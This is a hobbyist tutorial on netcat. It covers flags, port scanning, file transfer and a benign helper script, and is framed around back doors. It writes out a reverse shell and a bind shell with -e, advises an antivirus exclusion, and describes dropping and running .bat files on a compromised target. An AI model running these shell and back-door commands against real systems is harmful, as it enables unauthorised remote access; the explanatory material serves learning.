More Fun With Netcat!!
If you haven't read Duct tape's guide to Netcat Backdoors, read that first, then come back here. This Instructable goes over the basic netcat commands and how to use them, and also covers some basic batch commands.
Getting Netcat
The first thing I like to have is netcat on my own computer. Don't be afraid to install it. Netcat is not a back door in itself, but it can be used to create one. Netcat reads and writes raw TCP and UDP connections from the command line, so if you are serious about learning how network services behave, you should get netcat.
To get netcat, search for it on Google; if you are using Windows, search for the Windows port (nc.exe). Be aware that many antivirus products flag nc.exe as a hacking tool and will quarantine it the moment it lands on disk, so you may have to add an exclusion for it.
Once you have the .exe, put it somewhere on your PATH so that you can run it from a command prompt. The usual suggestion is the Windows System32 folder (a folder, not a file), which needs administrator rights; any directory on your PATH works just as well.
After that you can just type nc at the command prompt to use it. For example, to connect to a back door you installed, you would use the command
nc -v <IP_HERE> <PORT_HERE>
-v is verbose, so netcat tells you whether the connection succeeded instead of sitting there silently. I will get into more commands in the next step.
Basic Netcat Commands
This is the option list that nc -h prints for the classic (Hobbit) netcat 1.10 build. Other netcat flavors, the OpenBSD netcat that most Linux distributions ship as nc and Nmap's ncat, print a different list and differ in a few flags; I point out the differences below where they matter.
-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on a remote host:
nc remote_host <port>
Connect to multiple ports on a remote host:
nc remote_host <port> ... <port>
For example:
nc www.somecompanyasanexample.com 21 25 80
Listen on a port for incoming connections:
nc -v -l -p <port>
A bare listener like this just prints whatever the connecting side sends; it only becomes a back door once you add -e to hand the connection to a shell (see below). On the OpenBSD netcat the listen syntax is nc -l <port>, and older versions of it refuse -p together with -l.
Connect to a remote host and serve a bash shell (a reverse shell):
nc -e /bin/bash remote_ip <port>
Listen on a port and serve a bash shell upon connect (a bind shell):
nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. The classic netcat only gets -e when it is compiled with -DGAPING_SECURITY_HOLE, and the option is named that for a reason: anyone who reaches the port gets a shell, with no authentication, over cleartext, running as the user who started netcat. The common Windows nc.exe build does include -e, the OpenBSD netcat never does, and Nmap's ncat calls it --exec. Run nc -h and look for -e in the option list to see which you have. On builds that have -L (listed above), -L instead of -l makes the listener re-arm after the client disconnects, which is what keeps a back door alive.
Port scan a remote host:
nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval between ports:
nc -i <seconds> -v -z remote_host <port>-<port>
-z means zero I/O: netcat completes the TCP connection and closes it without sending anything, so every open port it finds shows up in the target's logs as a completed connection. Add -w <seconds> so filtered ports do not stall the scan for the full TCP connect timeout, and -n to skip DNS lookups.
Pipe command output to a netcat request:
<command> | nc remote_host <port>
For example, to fetch a web page by hand:
printf 'GET / HTTP/1.0\r\n\r\n' | nc www.somecompanyasanexample.com 80
The original form of this is echo with Enter pressed twice inside the quotes. printf is used here because HTTP wants each line to end in CR LF and a blank line to end the request, and echo cannot write that portably. HTTP/1.0 is used because the server closes the connection when the response is done, which makes netcat exit.
Use source-routing to connect to a port on a remote host:
nc -g <gateway> remote_host <port>
Note: up to eight hop points may be specified using the -g flag. Use the -G flag to specify the source-routing pointer. Don't expect this to work anywhere real: IP source routing has been disabled or dropped by default on routers and hosts for decades, so these packets are normally discarded.
Set the source IP address. Use the -s flag to pick the local address netcat sends from:
nc -s source_ip remote_host <port>
This is often described as spoofing, but it is weaker than that. The address must belong to one of your own interfaces or the bind fails, and if you did somehow send from an address that is not yours, the remote host would answer that address rather than you, so a TCP connection could never complete. What -s is actually good for is choosing which of several local addresses (or which interface) a connection leaves from. The -s flag can be used along with most of the commands presented here.
Transfer a file. On the server host:
nc -v -w 2 -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to receive a file. To do this, run the following command on the client host:
nc -v -l -p <port> > <file>
and run the following command on the server host:
nc -v -w 2 <client_host> <port> < <file>
Two things netcat does not do for you here: it does not necessarily exit when the file has been sent, and it does not check that the bytes arrived. Putting -w 2 on the side that reads the file makes most builds give up two seconds after the last data so both ends exit; if an end still hangs, Ctrl-C it. Then compare a hash of the file on both hosts, for example with sha256sum. Everything in this section, including the shells above, crosses the network in cleartext with no authentication, which is exactly why these connections are so easy to spot on the wire.
All of the commands above, apart from the -e ones, work with any netcat build, though the listen syntax differs as noted.
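The script below is an added example; it is not part of the original Instructable and not code from the netcat project. It backs up three of the entries above: the note about -e (nc_flavor, nc_has_exec and nc_listen_args read the text that nc -h prints and say which netcat you have, whether -e is compiled in and which listen syntax it wants), the "pipe command output" entry (http_get_request builds the request with the CR LF line endings the Enter presses stand for) and the "Transfer a file" entry (transfer_demo runs the listener and sender over 127.0.0.1 and compares SHA-256 hashes, which netcat does not do for you). Port 48123, the payload text and the function names are my choices for the demo, and the script reports skipped instead of failing when nc or sha256sum is not installed.

```shell
#!/bin/sh
# Added example, not from the original Instructable or from netcat itself.
# nc_flavor / nc_has_exec / nc_listen_args read the text "nc -h" prints and
# tell you which netcat you have, whether -e is compiled in and which listen
# syntax it wants. http_get_request builds the request the "pipe command
# output" entry types by hand. transfer_demo runs the "Transfer a file" pair
# over 127.0.0.1 and compares SHA-256 hashes. Port 48123 and the payload text
# are made up for the demo.

# Classify a netcat build from its help text, which is passed in so the
# function can be checked against canned samples:
#   traditional  Hobbit nc 1.10 and its Windows port (the -h list above)
#   busybox      BusyBox's applet, same -l -p syntax as traditional
#   ncat         Nmap's ncat
#   openbsd      the netcat most Linux distributions install as nc
nc_flavor() {
    case $1 in
        *Ncat*) echo ncat ;;
        *BusyBox*) echo busybox ;;
        *"listen mode, for inbound connects"*) echo traditional ;;
        *) echo openbsd ;;
    esac
}

# -e is only there if the option list shows it: "-e prog" on a traditional
# build compiled with -DGAPING_SECURITY_HOLE, "-e PROG" on BusyBox, "--exec"
# on ncat. OpenBSD netcat never has it.
nc_has_exec() {
    case $1 in
        *"-e prog"*|*"-e PROG"*|*--exec*) echo yes ;;
        *) echo no ;;
    esac
}

# Traditional-style builds need "-l -p PORT"; OpenBSD netcat and ncat take
# "-l PORT" (older OpenBSD versions refuse -p together with -l).
nc_listen_args() {
    case $(nc_flavor "$1") in
        traditional|busybox) echo "-l -p $2" ;;
        *) echo "-l $2" ;;
    esac
}

# The request behind "echo ... | nc host 80". Each Enter in the original
# stands for CR LF, and a blank line ends the request; printf writes those
# bytes exactly, which echo does not do portably.
http_get_request() {
    printf 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' "$1"
}

# Listener receives a file, connecting side sends it, then both copies are
# hashed, because netcat gives no sign that the bytes arrived intact.
# Prints ok, mismatch, or skipped (no nc/sha256sum, or listener did not start).
transfer_demo() {
    command -v nc >/dev/null 2>&1 || { echo skipped; return 0; }
    command -v sha256sum >/dev/null 2>&1 || { echo skipped; return 0; }
    port=48123
    dir=$(mktemp -d)
    printf 'constructed test payload\n' > "$dir/in"
    help_text=$(nc -h 2>&1 || true)
    # shellcheck disable=SC2046  # the listen args are meant to word-split
    nc $(nc_listen_args "$help_text" "$port") > "$dir/out" 2>/dev/null &
    listener=$!
    sleep 1
    if ! kill -0 "$listener" 2>/dev/null; then
        rm -rf "$dir"; echo skipped; return 0
    fi
    # -w 2: give up two seconds after the last data, so the sender exits
    # once the file has gone out instead of waiting on the terminal.
    nc -w 2 127.0.0.1 "$port" < "$dir/in" 2>/dev/null || true
    # Bound the wait for the listener; kill it if it never sees the close.
    i=0
    while kill -0 "$listener" 2>/dev/null && [ "$i" -lt 10 ]; do
        sleep 1; i=$((i + 1))
    done
    kill "$listener" 2>/dev/null || true
    wait "$listener" 2>/dev/null || true
    if [ "$(sha256sum < "$dir/in")" = "$(sha256sum < "$dir/out")" ]; then
        result=ok
    else
        result=mismatch
    fi
    rm -rf "$dir"
    echo "$result"
}

# Set NC_HELPERS_DEMO=1 to run the transfer when the file is executed directly.
if [ "${NC_HELPERS_DEMO:-0}" = 1 ]; then
    transfer_demo
fi
```

Save it as nc_helpers.sh, source it from sh or bash, and call the functions; NC_HELPERS_DEMO=1 sh nc_helpers.sh runs the loopback transfer and prints ok, mismatch or skipped. The hash comparison is the part worth copying into real use: a netcat transfer that "finished" has only told you the connection closed, not that the file is whole.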
The Bat File Portion
Once you are in a computer or server, you can do pretty much anything you want. I usually use .vbs and .bat files, and I like to create them on the target rather than transfer them. You can transfer files with the netcat commands above, and Google will give you many other ways to move files around with MS-DOS commands, but I always use the echo method.
Once you're in, use this command:
echo put file contents here > name.ext
This creates the file in the current directory, one line per echo; use >> instead of > to append further lines. Two cmd.exe gotchas: the characters &, |, <, > and ^ inside the content have to be escaped with a caret (^&, ^|, ^<, ^>, ^^) or cmd treats them as operators, and inside a .bat file a literal % has to be written as %%.
Once the file exists, you can run it with the simple command line:
start filename
Netcat
There are many other things you can do with netcat, but I have not gone into them in this guide.
Please do not use back doors on computers you don't own, or where you have no permission.